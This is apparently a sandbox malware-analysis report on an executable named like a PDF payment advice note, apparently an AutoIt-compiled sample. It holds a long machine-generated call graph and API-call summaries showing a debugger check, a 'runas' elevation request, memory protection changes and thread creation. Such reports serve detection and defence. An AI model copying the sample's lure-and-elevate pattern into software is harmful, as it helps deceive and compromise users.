106233->106234 106235 8a963d 106234->106235 106236 844ee5 85 API calls 106235->106236 106237 8a9654 106236->106237 106238 86571c _W_store_winword 58 API calls 106237->106238 106239 8a965b 106238->106239 106240 86571c _W_store_winword 58 API calls 106239->106240 106241 8a9665 106240->106241 106242 844f0b 74 API calls 106241->106242 106243 8a9679 106242->106243 106244 8a9109 GetSystemTimeAsFileTime 106243->106244 106245 8a968c 106244->106245 106246 8a96a1 106245->106246 106247 8a96b6 106245->106247 106248 862d55 _free 58 API calls 106246->106248 106249 8a971b 106247->106249 106250 8a96bc 106247->106250 106252 8a96a7 106248->106252 106251 862d55 _free 58 API calls 106249->106251 106279 8a8b06 116 API calls __fcloseall 106250->106279 106251->106257 106255 862d55 _free 58 API calls 106252->106255 106254 8a9713 106256 862d55 _free 58 API calls 106254->106256 106255->106257 106256->106257 106257->106043 106257->106045 106259 843fa4 _memmove 106258->106259 106260 843f82 106258->106260 106261 860db6 Mailbox 59 API calls 106259->106261 106263 860db6 Mailbox 59 API calls 106260->106263 106262 843fb8 106261->106262 106262->106181 106263->106259 106264->106199 106265->106201 106266->106198 106267->106207 106269 849169 Mailbox 106268->106269 106270 87f19f 106269->106270 106275 849173 106269->106275 106271 860db6 Mailbox 59 API calls 106270->106271 106273 87f1ab 106271->106273 106272 84917a 106272->106212 106275->106272 106276 849c90 59 API calls Mailbox 106275->106276 106276->106275 106277->106218 106278->106217 106279->106254 106342 871940 106280->106342 106283 84477c 106285 847bcc 59 API calls 106283->106285 106284 844799 106286 847d8c 59 API calls 106284->106286 106287 844788 106285->106287 106286->106287 106344 847726 106287->106344 106290 860791 106291 86079e __ftell_nolock 106290->106291 106292 86079f GetLongPathNameW 106291->106292 106293 847bcc 59 API calls 106292->106293 106294 8472bd 106293->106294 106295 84700b 106294->106295 106296 847667 59 API calls 106295->106296 106297 84701d 106296->106297 106298 844750 60 API calls 106297->106298 106299 847028 106298->106299 106300 847033 106299->106300 106304 87e885 106299->106304 106301 843f74 59 API calls 106300->106301 106303 84703f 106301->106303 106348 8434c2 106303->106348 106306 87e89f 106304->106306 106354 847908 61 API calls 106304->106354 106307 847052 Mailbox 106307->106122 106309 844ddd 136 API calls 106308->106309 106310 84688f 106309->106310 106311 87e031 106310->106311 106313 844ddd 136 API calls 106310->106313 106312 8a955b 122 API calls 106311->106312 106315 87e046 106312->106315 106314 8468a3 106313->106314 106314->106311 106316 8468ab 106314->106316 106317 87e067 106315->106317 106318 87e04a 106315->106318 106319 8468b7 106316->106319 106320 87e052 106316->106320 106322 860db6 Mailbox 59 API calls 106317->106322 106321 844e4a 84 API calls 106318->106321 106355 846a8c 106319->106355 106448 8a42f8 90 API calls _wprintf 106320->106448 106321->106320 106341 87e0ac Mailbox 106322->106341 106326 87e060 106326->106317 106327 87e260 106328 862d55 _free 58 API calls 106327->106328 106329 87e268 106328->106329 106330 844e4a 84 API calls 106329->106330 106335 87e271 106330->106335 106334 862d55 _free 58 API calls 106334->106335 106335->106334 106336 844e4a 84 API calls 106335->106336 106454 89f7a1 89 API calls 4 library calls 106335->106454 106336->106335 106338 847de1 59 API calls 106338->106341 106341->106327 106341->106335 106341->106338 106449 89f73d 59 API calls 2 library calls 106341->106449 106450 89f65e 61 API calls 2 library calls 106341->106450 106451 8a737f 59 API calls Mailbox 106341->106451 106452 84750f 59 API calls 2 library calls 106341->106452 106453 84735d 59 API calls Mailbox 106341->106453 106343 84475d GetFullPathNameW 106342->106343 106343->106283 106343->106284 106345 847734 106344->106345 106346 847d2c 59 API calls 106345->106346 106347 844794 106346->106347 106347->106290 106349 8434d4 106348->106349 106353 8434f3 _memmove 106348->106353 106352 860db6 Mailbox 59 API calls 106349->106352 106350 860db6 Mailbox 59 API calls 106351 84350a 106350->106351 106351->106307 106352->106353 106353->106350 106354->106304 106356 846ab5 106355->106356 106357 87e41e 106355->106357 106460 8457a6 60 API calls Mailbox 106356->106460 106476 89f7a1 89 API calls 4 library calls 106357->106476 106360 846ad7 106461 8457f6 67 API calls 106360->106461 106361 87e431 106477 89f7a1 89 API calls 4 library calls 106361->106477 106363 846aec 106363->106361 106365 846af4 106363->106365 106367 847667 59 API calls 106365->106367 106366 87e44d 106369 846b61 106366->106369 106368 846b00 106367->106368 106462 860957 60 API calls __ftell_nolock 106368->106462 106371 87e460 106369->106371 106372 846b6f 106369->106372 106374 845c6f CloseHandle 106371->106374 106375 847667 59 API calls 106372->106375 106373 846b0c 106376 847667 59 API calls 106373->106376 106378 87e46c 106374->106378 106379 846b78 106375->106379 106377 846b18 106376->106377 106380 844750 60 API calls 106377->106380 106381 844ddd 136 API calls 106378->106381 106382 847667 59 API calls 106379->106382 106383 846b26 106380->106383 106384 87e488 106381->106384 106385 846b81 106382->106385 106463 845850 ReadFile SetFilePointerEx 106383->106463 106387 87e4b1 106384->106387 106390 8a955b 122 API calls 106384->106390 106388 84459b 59 API calls 106385->106388 106478 89f7a1 89 API calls 4 library calls 106387->106478 106391 846b98 106388->106391 106389 846b52 106464 845aee SetFilePointerEx SetFilePointerEx 106389->106464 106395 87e4a4 106390->106395 106396 847b2e 59 API calls 106391->106396 106393 87e4c8 106428 846d0c Mailbox 106393->106428 106397 87e4cd 106395->106397 106398 87e4ac 106395->106398 106399 846ba9 SetCurrentDirectoryW 106396->106399 106400 844e4a 84 API calls 106397->106400 106401 844e4a 84 API calls 106398->106401 106404 846bbc Mailbox 106399->106404 106402 87e4d2 106400->106402 106401->106387 106403 860db6 Mailbox 59 API calls 106402->106403 106410 87e506 106403->106410 106406 860db6 Mailbox 59 API calls 106404->106406 106408 846bcf 106406->106408 106407 843bbb 106407->105981 106407->105989 106409 84522e 59 API calls 106408->106409 106423 846bda Mailbox __wsetenvp 106409->106423 106479 84750f 59 API calls 2 library calls 106410->106479 106412 846ce7 106472 845c6f 106412->106472 106415 87e740 106485 8a72df 59 API calls Mailbox 106415->106485 106416 846cf3 SetCurrentDirectoryW 106416->106428 106417 87e54f Mailbox 106417->106415 106439 847de1 59 API calls 106417->106439 106443 87e792 106417->106443 106480 89f73d 59 API calls 2 library calls 106417->106480 106481 89f65e 61 API calls 2 library calls 106417->106481 106482 8a737f 59 API calls Mailbox 106417->106482 106483 84750f 59 API calls 2 library calls 106417->106483 106484 847213 59 API calls Mailbox 106417->106484 106420 87e762 106486 8bfbce 59 API calls 2 library calls 106420->106486 106423->106412 106425 87e7d9 106423->106425 106433 87e7d1 106423->106433 106436 847de1 59 API calls 106423->106436 106465 84586d 67 API calls _wcscpy 106423->106465 106466 846f5d GetStringTypeW 106423->106466 106467 846ecc 60 API calls __wcsnicmp 106423->106467 106468 846faa GetStringTypeW __wsetenvp 106423->106468 106469 86363d GetStringTypeW _iswctype 106423->106469 106470 8468dc 165 API calls 3 library calls 106423->106470 106471 847213 59 API calls Mailbox 106423->106471 106424 87e76f 106426 862d55 _free 58 API calls 106424->106426 106489 89f7a1 89 API calls 4 library calls 106425->106489 106426->106428 106455 8457d4 106428->106455 106431 87e7f2 106431->106412 106488 89f5f7 59 API calls 4 library calls 106433->106488 106436->106423 106439->106417 106487 89f7a1 89 API calls 4 library calls 106443->106487 106445 87e7ab 106446 862d55 _free 58 API calls 106445->106446 106447 87e7be 106446->106447 106447->106428 106448->106326 106449->106341 106450->106341 106451->106341 106452->106341 106453->106341 106454->106335 106456 845c6f CloseHandle 106455->106456 106457 8457dc Mailbox 106456->106457 106458 845c6f CloseHandle 106457->106458 106459 8457eb 106458->106459 106459->106407 106460->106360 106461->106363 106462->106373 106463->106389 106464->106369 106465->106423 106466->106423 106467->106423 106468->106423 106469->106423 106470->106423 106471->106423 106473 845c88 106472->106473 106474 845c79 106472->106474 106473->106474 106475 845c8d CloseHandle 106473->106475 106474->106416 106475->106474 106476->106361 106477->106366 106478->106393 106479->106417 106480->106417 106481->106417 106482->106417 106483->106417 106484->106417 106485->106420 106486->106424 106487->106445 106488->106425 106489->106431 106491 846d95 106490->106491 106495 846ea9 106490->106495 106492 860db6 Mailbox 59 API calls 106491->106492 106491->106495 106494 846dbc 106492->106494 106493 860db6 Mailbox 59 API calls 106499 846e31 106493->106499 106494->106493 106495->106128 106499->106495 106501->106130 106535 841055 106540 842649 106535->106540 106538 862d40 __cinit 67 API calls 106539 841064 106538->106539 106541 847667 59 API calls 106540->106541 106542 8426b7 106541->106542 106547 843582 106542->106547 106545 842754 106546 84105a 106545->106546 106550 843416 59 API calls 2 library calls 106545->106550 106546->106538 106551 8435b0 106547->106551 106550->106545 106552 8435bd 106551->106552 106553 8435a1 106551->106553 106552->106553 106554 8435c4 RegOpenKeyExW 106552->106554 106553->106545 106554->106553 106555 8435de RegQueryValueExW 106554->106555 106556 843614 RegCloseKey 106555->106556 106557 8435ff 106555->106557 106556->106553 106557->106556 106558 841016 106563 844974 106558->106563 106561 862d40 __cinit 67 API calls 106562 841025 106561->106562 106564 860db6 Mailbox 59 API calls 106563->106564 106565 84497c 106564->106565 106566 84101b 106565->106566 106570 844936 106565->106570 106566->106561 106571 844951 106570->106571 106572 84493f 106570->106572 106574 8449a0 106571->106574 106573 862d40 __cinit 67 API calls 106572->106573 106573->106571 106575 847667 59 API calls 106574->106575 106576 8449b8 GetVersionExW 106575->106576 106577 847bcc 59 API calls 106576->106577 106578 8449fb 106577->106578 106579 847d2c 59 API calls 106578->106579 106588 844a28 106578->106588 106580 844a1c 106579->106580 106581 847726 59 API calls 106580->106581 106581->106588 106582 844a93 GetCurrentProcess IsWow64Process 106583 844aac 106582->106583 106584 844ac2 106583->106584 106585 844b2b GetSystemInfo 106583->106585 106598 844b37 106584->106598 106589 844af8 106585->106589 106586 87d864 106588->106582 106588->106586 106589->106566 106591 844ad4 106593 844b37 2 API calls 106591->106593 106592 844b1f GetSystemInfo 106594 844ae9 106592->106594 106595 844adc GetNativeSystemInfo 106593->106595 106594->106589 106596 844aef FreeLibrary 106594->106596 106595->106594 106596->106589 106599 844ad0 106598->106599 106600 844b40 LoadLibraryA 106598->106600 106599->106591 106599->106592 106600->106599 106601 844b51 GetProcAddress 106600->106601 106601->106599 106602 841066 106607 84f76f 106602->106607 106604 84106c 106605 862d40 __cinit 67 API calls 106604->106605 106606 841076 106605->106606 106608 84f790 106607->106608 106640 85ff03 106608->106640 106612 84f7d7 106613 847667 59 API calls 106612->106613 106614 84f7e1 106613->106614 106615 847667 59 API calls 106614->106615 106616 84f7eb 106615->106616 106617 847667 59 API calls 106616->106617 106618 84f7f5 106617->106618 106619 847667 59 API calls 106618->106619 106620 84f833 106619->106620 106621 847667 59 API calls 106620->106621 106622 84f8fe 106621->106622 106650 855f87 106622->106650 106626 84f930 106627 847667 59 API calls 106626->106627 106628 84f93a 106627->106628 106678 85fd9e 106628->106678 106630 84f981 106631 84f991 GetStdHandle 106630->106631 106632 8845ab 106631->106632 106633 84f9dd 106631->106633 106632->106633 106635 8845b4 106632->106635 106634 84f9e5 OleInitialize 106633->106634 106634->106604 106685 8a6b38 64 API calls Mailbox 106635->106685 106637 8845bb 106686 8a7207 CreateThread 106637->106686 106639 8845c7 CloseHandle 106639->106634 106687 85ffdc 106640->106687 106643 85ffdc 59 API calls 106644 85ff45 106643->106644 106645 847667 59 API calls 106644->106645 106646 85ff51 106645->106646 106647 847bcc 59 API calls 106646->106647 106648 84f796 106647->106648 106649 860162 6 API calls 106648->106649 106649->106612 106651 847667 59 API calls 106650->106651 106652 855f97 106651->106652 106653 847667 59 API calls 106652->106653 106654 855f9f 106653->106654 106694 855a9d 106654->106694 106657 855a9d 59 API calls 106658 855faf 106657->106658 106659 847667 59 API calls 106658->106659 106660 855fba 106659->106660 106661 860db6 Mailbox 59 API calls 106660->106661 106662 84f908 106661->106662 106663 8560f9 106662->106663 106664 856107 106663->106664 106665 847667 59 API calls 106664->106665 106666 856112 106665->106666 106667 847667 59 API calls 106666->106667 106668 85611d 106667->106668 106669 847667 59 API calls 106668->106669 106670 856128 106669->106670 106671 847667 59 API calls 106670->106671 106672 856133 106671->106672 106673 855a9d 59 API calls 106672->106673 106674 85613e 106673->106674 106675 860db6 Mailbox 59 API calls 106674->106675 106676 856145 RegisterWindowMessageW 106675->106676 106676->106626 106679 89576f 106678->106679 106680 85fdae 106678->106680 106697 8a9ae7 60 API calls 106679->106697 106682 860db6 Mailbox 59 API calls 106680->106682 106684 85fdb6 106682->106684 106683 89577a 106684->106630 106685->106637 106686->106639 106698 8a71ed 65 API calls 106686->106698 106688 847667 59 API calls 106687->106688 106689 85ffe7 106688->106689 106690 847667 59 API calls 106689->106690 106691 85ffef 106690->106691 106692 847667 59 API calls 106691->106692 106693 85ff3b 106692->106693 106693->106643 106695 847667 59 API calls 106694->106695 106696 855aa5 106695->106696 106696->106657 106697->106683 106699 1655310 106713 1652f60 106699->106713 106701 16553e8 106716 1655200 106701->106716 106719 1656410 GetPEB 106713->106719 106715 16535eb 106715->106701 106717 1655209 Sleep 106716->106717 106718 1655217 106717->106718 106720 165643a 106719->106720 106720->106715 106721 843633 106722 84366a 106721->106722 106723 8436e7 106722->106723 106724 843688 106722->106724 106760 8436e5 106722->106760 106726 8436ed 106723->106726 106727 87d0cc 106723->106727 106728 843695 106724->106728 106729 84374b PostQuitMessage 106724->106729 106725 8436ca DefWindowProcW 106752 8436d8 106725->106752 106732 843715 SetTimer RegisterWindowMessageW 106726->106732 106733 8436f2 106726->106733 106776 851070 10 API calls Mailbox 106727->106776 106730 87d154 106728->106730 106731 8436a0 106728->106731 106729->106752 106781 8a2527 71 API calls _memset 106730->106781 106736 843755 106731->106736 106737 8436a8 106731->106737 106738 84373e CreatePopupMenu 106732->106738 106732->106752 106740 87d06f 106733->106740 106741 8436f9 KillTimer 106733->106741 106735 87d0f3 106777 851093 331 API calls Mailbox 106735->106777 106766 8444a0 106736->106766 106743 8436b3 106737->106743 106744 87d139 106737->106744 106738->106752 106747 87d074 106740->106747 106748 87d0a8 MoveWindow 106740->106748 106773 84443a Shell_NotifyIconW _memset 106741->106773 106750 8436be 106743->106750 106751 87d124 106743->106751 106744->106725 106780 897c36 59 API calls Mailbox 106744->106780 106745 87d166 106745->106725 106745->106752 106753 87d097 SetFocus 106747->106753 106754 87d078 106747->106754 106748->106752 106750->106725 106778 84443a Shell_NotifyIconW _memset 106750->106778 106779 8a2d36 81 API calls _memset 106751->106779 106753->106752 106754->106750 106756 87d081 106754->106756 106755 84370c 106774 843114 DeleteObject DestroyWindow Mailbox 106755->106774 106775 851070 10 API calls Mailbox 106756->106775 106760->106725 106762 87d134 106762->106752 106764 87d118 106765 84434a 68 API calls 106764->106765 106765->106760 106767 8444b7 _memset 106766->106767 106768 844539 106766->106768 106769 84407c 61 API calls 106767->106769 106768->106752 106772 8444de 106769->106772 106770 844522 KillTimer SetTimer 106770->106768 106771 87d4ab Shell_NotifyIconW 106771->106770 106772->106770 106772->106771 106773->106755 106774->106752 106775->106752 106776->106735 106777->106750 106778->106764 106779->106762 106780->106760 106781->106745 106782 88416f 106786 895fe6 106782->106786 106784 88417a 106785 895fe6 85 API calls 106784->106785 106785->106784 106792 896020 106786->106792 106794 895ff3 106786->106794 106787 896022 106798 849328 84 API calls Mailbox 106787->106798 106789 896027 106790 849837 84 API calls 106789->106790 106791 89602e 106790->106791 106793 847b2e 59 API calls 106791->106793 106792->106784 106793->106792 106794->106787 106794->106789 106794->106792 106795 89601a 106794->106795 106797 8495a0 59 API calls _wcsstr 106795->106797 106797->106792 106798->106789 106799 84107d 106804 84708b 106799->106804 106801 84108c 106802 862d40 __cinit 67 API calls 106801->106802 106803 841096 106802->106803 106805 84709b __ftell_nolock 106804->106805 106806 847667 59 API calls 106805->106806 106807 847151 106806->106807 106808 844706 61 API calls 106807->106808 106809 84715a 106808->106809 106835 86050b 106809->106835 106812 847cab 59 API calls 106813 847173 106812->106813 106814 843f74 59 API calls 106813->106814 106815 847182 106814->106815 106816 847667 59 API calls 106815->106816 106817 84718b 106816->106817 106818 847d8c 59 API calls 106817->106818 106819 847194 RegOpenKeyExW 106818->106819 106820 87e8b1 RegQueryValueExW 106819->106820 106824 8471b6 Mailbox 106819->106824 106821 87e943 RegCloseKey 106820->106821 106822 87e8ce 106820->106822 106821->106824 106834 87e955 _wcscat Mailbox __wsetenvp 106821->106834 106823 860db6 Mailbox 59 API calls 106822->106823 106825 87e8e7 106823->106825 106824->106801 106827 84522e 59 API calls 106825->106827 106826 8479f2 59 API calls 106826->106834 106828 87e8f2 RegQueryValueExW 106827->106828 106829 87e90f 106828->106829 106831 87e929 106828->106831 106830 847bcc 59 API calls 106829->106830 106830->106831 106831->106821 106832 847de1 59 API calls 106832->106834 106833 843f74 59 API calls 106833->106834 106834->106824 106834->106826 106834->106832 106834->106833 106836 871940 __ftell_nolock 106835->106836 106837 860518 GetFullPathNameW 106836->106837 106838 86053a 106837->106838 106839 847bcc 59 API calls 106838->106839 106840 847165 106839->106840 106840->106812 106841 87fdfc 106859 84ab30 Mailbox _memmove 106841->106859 106845 860db6 59 API calls Mailbox 106845->106859 106847 84b525 106908 8a9e4a 89 API calls 4 library calls 106847->106908 106849 860db6 59 API calls Mailbox 106852 849f37 Mailbox 106849->106852 106850 8809e5 106914 8a9e4a 89 API calls 4 library calls 106850->106914 106851 880055 106907 8a9e4a 89 API calls 4 library calls 106851->106907 106852->106849 106852->106851 106853 84b47a 106852->106853 106857 84b475 106852->106857 106858 84a057 106852->106858 106864 848047 59 API calls 106852->106864 106866 847667 59 API calls 106852->106866 106867 896e8f 59 API calls 106852->106867 106868 862d40 67 API calls __cinit 106852->106868 106870 8809d6 106852->106870 106873 84a55a 106852->106873 106896 84c8c0 331 API calls 2 library calls 106852->106896 106897 84b900 60 API calls Mailbox 106852->106897 106853->106850 106853->106851 106863 848047 59 API calls 106857->106863 106859->106845 106859->106847 106859->106852 106859->106858 106869 847de1 59 API calls 106859->106869 106875 84b2b6 106859->106875 106876 849ea0 331 API calls 106859->106876 106878 88086a 106859->106878 106880 880878 106859->106880 106882 88085c 106859->106882 106883 84b21c 106859->106883 106887 896e8f 59 API calls 106859->106887 106890 8bdf37 106859->106890 106893 8bdf23 106859->106893 106898 849c90 59 API calls Mailbox 106859->106898 106902 8bc193 85 API calls 2 library calls 106859->106902 106903 8bc2e0 96 API calls Mailbox 106859->106903 106904 8a7956 59 API calls Mailbox 106859->106904 106905 8bbc6b 331 API calls Mailbox 106859->106905 106906 89617e 59 API calls Mailbox 106859->106906 106860 880064 106863->106858 106864->106852 106866->106852 106867->106852 106868->106852 106869->106859 106913 8a9e4a 89 API calls 4 library calls 106870->106913 106912 8a9e4a 89 API calls 4 library calls 106873->106912 106901 84f6a3 331 API calls 106875->106901 106876->106859 106910 849c90 59 API calls Mailbox 106878->106910 106911 8a9e4a 89 API calls 4 library calls 106880->106911 106882->106858 106909 89617e 59 API calls Mailbox 106882->106909 106899 849d3c 60 API calls Mailbox 106883->106899 106885 84b22d 106900 849d3c 60 API calls Mailbox 106885->106900 106887->106859 106915 8bcadd 106890->106915 106892 8bdf47 106892->106859 106894 8bcadd 130 API calls 106893->106894 106895 8bdf33 106894->106895 106895->106859 106896->106852 106897->106852 106898->106859 106899->106885 106900->106875 106901->106847 106902->106859 106903->106859 106904->106859 106905->106859 106906->106859 106907->106860 106908->106882 106909->106858 106910->106882 106911->106882 106912->106858 106913->106850 106914->106858 106916 849837 84 API calls 106915->106916 106917 8bcb1a 106916->106917 106936 8bcb61 Mailbox 106917->106936 106953 8bd7a5 106917->106953 106919 8bcdb9 106920 8bcf2e 106919->106920 106924 8bcdc7 106919->106924 106992 8bd8c8 92 API calls Mailbox 106920->106992 106923 8bcf3d 106923->106924 106926 8bcf49 106923->106926 106966 8bc96e 106924->106966 106925 849837 84 API calls 106941 8bcbb2 Mailbox 106925->106941 106926->106936 106931 8bce00 106981 860c08 106931->106981 106934 8bce1a 106987 8a9e4a 89 API calls 4 library calls 106934->106987 106935 8bce33 106938 8492ce 59 API calls 106935->106938 106936->106892 106940 8bce3f 106938->106940 106939 8bce25 GetCurrentProcess TerminateProcess 106939->106935 106942 849050 59 API calls 106940->106942 106941->106919 106941->106925 106941->106936 106985 8bfbce 59 API calls 2 library calls 106941->106985 106986 8bcfdf 61 API calls 2 library calls 106941->106986 106943 8bce55 106942->106943 106952 8bce7c 106943->106952 106988 848d40 59 API calls Mailbox 106943->106988 106945 8bcfa4 106945->106936 106949 8bcfb8 FreeLibrary 106945->106949 106946 8bce6b 106989 8bd649 107 API calls _free 106946->106989 106949->106936 106952->106945 106990 848d40 59 API calls Mailbox 106952->106990 106991 849d3c 60 API calls Mailbox 106952->106991 106993 8bd649 107 API calls _free 106952->106993 106954 847e4f 59 API calls 106953->106954 106955 8bd7c0 CharLowerBuffW 106954->106955 106994 89f167 106955->106994 106959 847667 59 API calls 106960 8bd7f9 106959->106960 106961 84784b 59 API calls 106960->106961 106962 8bd810 106961->106962 106963 847d2c 59 API calls 106962->106963 106964 8bd81c Mailbox 106963->106964 106965 8bd858 Mailbox 106964->106965 107001 8bcfdf 61 API calls 2 library calls 106964->107001 106965->106941 106967 8bc989 106966->106967 106971 8bc9de 106966->106971 106968 860db6 Mailbox 59 API calls 106967->106968 106970 8bc9ab 106968->106970 106969 860db6 Mailbox 59 API calls 106969->106970 106970->106969 106970->106971 106972 8bda50 106971->106972 106973 8bdc79 Mailbox 106972->106973 106980 8bda73 _strcat _wcscpy __wsetenvp 106972->106980 106973->106931 106974 849be6 59 API calls 106974->106980 106975 849b3c 59 API calls 106975->106980 106976 849b98 59 API calls 106976->106980 106977 849837 84 API calls 106977->106980 106978 86571c 58 API calls _W_store_winword 106978->106980 106980->106973 106980->106974 106980->106975 106980->106976 106980->106977 106980->106978 107004 8a5887 61 API calls 2 library calls 106980->107004 106983 860c1d 106981->106983 106982 860cb5 VirtualProtect 106984 860c83 106982->106984 106983->106982 106983->106984 106984->106934 106984->106935 106985->106941 106986->106941 106987->106939 106988->106946 106989->106952 106990->106952 106991->106952 106992->106923 106993->106952 106995 89f192 __wsetenvp 106994->106995 106996 89f1d1 106995->106996 106998 89f1c7 106995->106998 107000 89f278 106995->107000 106996->106959 106996->106964 106998->106996 107002 8478c4 61 API calls 106998->107002 107000->106996 107003 8478c4 61 API calls 107000->107003 107001->106965 107002->106998 107003->107000 107004->106980

                                                              Executed Functions

                                                              Function 00843B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153windowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00843B68
                                                              • IsDebuggerPresent.KERNEL32 ref: 00843B7A
                                                              • GetFullPathNameW.KERNEL32(00007FFF,?,?,009052F8,009052E0,?,?), ref: 00843BEB
                                                                • Part of subcall function 00847BCC: _memmove.LIBCMT ref: 00847C06
                                                                • Part of subcall function 0085092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00843C14,009052F8,?,?,?), ref: 0085096E
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00843C6F
                                                              • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,008F7770,00000010), ref: 0087D281
                                                              • SetCurrentDirectoryW.KERNEL32(?,009052F8,?,?,?), ref: 0087D2B9
                                                              • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,008F4260,009052F8,?,?,?), ref: 0087D33F
                                                              • ShellExecuteW.SHELL32(00000000,?,?), ref: 0087D346
                                                                • Part of subcall function 00843A46: GetSysColorBrush.USER32(0000000F), ref: 00843A50
                                                                • Part of subcall function 00843A46: LoadCursorW.USER32(00000000,00007F00), ref: 00843A5F
                                                                • Part of subcall function 00843A46: LoadIconW.USER32(00000063), ref: 00843A76
                                                                • Part of subcall function 00843A46: LoadIconW.USER32(000000A4), ref: 00843A88
                                                                • Part of subcall function 00843A46: LoadIconW.USER32(000000A2), ref: 00843A9A
                                                                • Part of subcall function 00843A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00843AC0
                                                                • Part of subcall function 00843A46: RegisterClassExW.USER32(?), ref: 00843B16
                                                                • Part of subcall function 008439D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00843A03
                                                                • Part of subcall function 008439D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00843A24
                                                                • Part of subcall function 008439D5: ShowWindow.USER32(00000000,?,?), ref: 00843A38
                                                                • Part of subcall function 008439D5: ShowWindow.USER32(00000000,?,?), ref: 00843A41
                                                                • Part of subcall function 0084434A: _memset.LIBCMT ref: 00844370
                                                                • Part of subcall function 0084434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00844415
                                                              Strings
                                                              • This is a third-party compiled AutoIt script., xrefs: 0087D279
                                                              • runas, xrefs: 0087D33A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                              • String ID: This is a third-party compiled AutoIt script.$runas
                                                              • API String ID: 529118366-3287110873
                                                              • Opcode ID: ee0824aa38ab80534c009069e8942448b858d525e12bac2a8aa908a2515f9bfc
                                                              • Instruction ID: cf7a278de521a3629ea9bb43022f582cc0eff54416e508804123d911e0eba46b
                                                              • Opcode Fuzzy Hash: ee0824aa38ab80534c009069e8942448b858d525e12bac2a8aa908a2515f9bfc
                                                              • Instruction Fuzzy Hash: ED51BF3190824DAEEF11ABBCDC45EAE7B79FF45714F008065F521E22A2DB709646DF22
                                                              Function 008449A0 Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 996 8449a0-844a00 call 847667 GetVersionExW call 847bcc 1001 844a06 996->1001 1002 844b0b-844b0d 996->1002 1003 844a09-844a0e 1001->1003 1004 87d767-87d773 1002->1004 1006 844a14 1003->1006 1007 844b12-844b13 1003->1007 1005 87d774-87d778 1004->1005 1008 87d77b-87d787 1005->1008 1009 87d77a 1005->1009 1010 844a15-844a4c call 847d2c call 847726 1006->1010 1007->1010 1008->1005 1011 87d789-87d78e 1008->1011 1009->1008 1019 87d864-87d867 1010->1019 1020 844a52-844a53 1010->1020 1011->1003 1013 87d794-87d79b 1011->1013 1013->1004 1015 87d79d 1013->1015 1018 87d7a2-87d7a5 1015->1018 1021 844a93-844aaa GetCurrentProcess IsWow64Process 1018->1021 1022 87d7ab-87d7c9 1018->1022 1023 87d880-87d884 1019->1023 1024 87d869 1019->1024 1020->1018 1025 844a59-844a64 1020->1025 1032 844aac 1021->1032 1033 844aaf-844ac0 1021->1033 1022->1021 1026 87d7cf-87d7d5 1022->1026 1030 87d886-87d88f 1023->1030 1031 87d86f-87d878 1023->1031 1027 87d86c 1024->1027 1028 87d7ea-87d7f0 1025->1028 1029 844a6a-844a6c 1025->1029 1036 87d7d7-87d7da 1026->1036 1037 87d7df-87d7e5 1026->1037 1027->1031 1040 87d7f2-87d7f5 1028->1040 1041 87d7fa-87d800 1028->1041 1038 87d805-87d811 1029->1038 1039 844a72-844a75 1029->1039 1030->1027 1042 87d891-87d894 1030->1042 1031->1023 1032->1033 1034 844ac2-844ad2 call 844b37 1033->1034 1035 844b2b-844b35 GetSystemInfo 1033->1035 1053 844ad4-844ae1 call 844b37 1034->1053 1054 844b1f-844b29 GetSystemInfo 1034->1054 1048 844af8-844b08 1035->1048 1036->1021 1037->1021 1043 87d813-87d816 1038->1043 1044 87d81b-87d821 1038->1044 1046 87d831-87d834 1039->1046 1047 844a7b-844a8a 1039->1047 1040->1021 1041->1021 1042->1031 1043->1021 1044->1021 1046->1021 1050 87d83a-87d84f 1046->1050 1051 87d826-87d82c 1047->1051 1052 844a90 1047->1052 1055 87d851-87d854 1050->1055 1056 87d859-87d85f 1050->1056 1051->1021 1052->1021 1061 844ae3-844ae7 GetNativeSystemInfo 1053->1061 1062 844b18-844b1d 1053->1062 1058 844ae9-844aed 1054->1058 1055->1021 1056->1021 1058->1048 1060 844aef-844af2 FreeLibrary 1058->1060 1060->1048 1061->1058 1062->1061
                                                              APIs
                                                              • GetVersionExW.KERNEL32(?), ref: 008449CD
                                                                • Part of subcall function 00847BCC: _memmove.LIBCMT ref: 00847C06
                                                              • GetCurrentProcess.KERNEL32(?,008CFAEC,00000000,00000000,?), ref: 00844A9A
                                                              • IsWow64Process.KERNEL32(00000000), ref: 00844AA1
                                                              • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00844AE7
                                                              • FreeLibrary.KERNEL32(00000000), ref: 00844AF2
                                                              • GetSystemInfo.KERNEL32(00000000), ref: 00844B23
                                                              • GetSystemInfo.KERNEL32(00000000), ref: 00844B2F
                                                              Memory Dump Source
